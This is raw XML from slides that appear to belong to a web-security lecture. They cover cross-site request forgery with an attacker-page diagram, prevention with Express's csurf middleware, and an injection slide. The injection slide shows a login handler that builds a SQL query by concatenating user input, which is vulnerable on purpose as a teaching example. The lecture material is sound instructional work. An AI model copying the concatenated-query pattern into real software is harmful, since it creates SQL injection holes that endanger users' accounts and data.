          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4129209" y="3384789"/>
            <a:ext cx="1373400" cy="3693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Get page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94B0119-EA88-4E8B-8124-DAE0377425ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1566000" y="4417265"/>
            <a:ext cx="1400460" cy="92333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Page</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With bad JS.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="Straight Arrow Connector 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29A7320A-CF57-4B98-B0DF-A2D525E8D31B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1566000" y="4228936"/>
            <a:ext cx="4006494" cy="504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8A61394-DD0C-4829-933C-0BA04B05E786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5742343" y="5433209"/>
            <a:ext cx="4264089" cy="1930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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F08715-2F1F-465E-8288-FAA1E34A4268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5690206" y="5450857"/>
            <a:ext cx="2658166" cy="120032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Transfer Money</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From: You</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To: Hacker</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Amount: $1000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="Straight Connector 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D08A3F-198E-4476-A418-AB65D6B3D71F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5662417" y="4815278"/>
            <a:ext cx="0" cy="544731"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88D31F3B-3B15-4689-BC7D-ABBFFE3625D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5662416" y="4713678"/>
            <a:ext cx="3562855" cy="6463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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Display page</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bad JS sends POST request.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{174795E8-5790-4712-8434-07CA33E16711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10072039" y="5695740"/>
            <a:ext cx="1828857" cy="424732"/>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rPr>
              <a:t>No token!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Speech Bubble: Oval 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A40F57B6-96F7-4D32-8657-D951A19CA7E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1566000" y="5461609"/>
            <a:ext cx="3578087" cy="1331844"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 62876"/>
              <a:gd name="adj2" fmla="val -671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Same-origin policy forbids GET request for the form.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13543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p:bldP spid="36" grpId="0"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="45" grpId="0"/>
      <p:bldP spid="47" grpId="0"/>
      <p:bldP spid="26" grpId="0" build="p"/>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Preventing CSRF in Express</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1825625"/>
            <a:ext cx="10515601" cy="433965"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>csurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/expressjs/csurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{570822BD-CA96-425C-AA26-30201A2E2E39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="364670" y="2394527"/>
            <a:ext cx="11462657" cy="3869008"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>csurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>require</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csurf</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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app.use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>csurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>({cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>true</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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('/transfer',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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> token = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request.csrfToken</a:t>
            </a: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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Insert secret into &lt;input name="_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" value="THE_TOKEN"&gt;</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a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app.post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('/transfer', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Code here only runs if token matches.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="22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55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7A890910-04E0-43B9-960C-57BE3D5F7570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="814574" y="3657029"/>
            <a:ext cx="10515600" cy="2544286"/>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app.post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('/login', </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1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request.body.username</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1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request.body.password</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2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>query = `SELECT id FROM accounts WHERE</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username = "`+username+`" AND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password = "`+password+`"`</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noProof="0" dirty="0"/>
              <a:t>#1 Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1493476"/>
            <a:ext cx="10515600" cy="1997983"/>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1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;form method="post" action="/login"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Username: &lt;input type="text" name="username"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</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Password: &lt;input type="password" name="password"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;input type="submit" value="Sign in!"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7958927" y="2675030"/>
            <a:ext cx="3635829" cy="1632858"/>
            <a:chOff x="6934200" y="1926771"/>
            <a:chExt cx="3788229" cy="2329543"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rounded Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6934200" y="1926771"/>
              <a:ext cx="3788229" cy="23295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extBox 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7209871" y="2094396"/>
              <a:ext cx="3236885" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Sign in</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7108371" y="2631279"/>
              <a:ext cx="1368364" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Username:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7108371" y="3075829"/>
              <a:ext cx="1368364" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
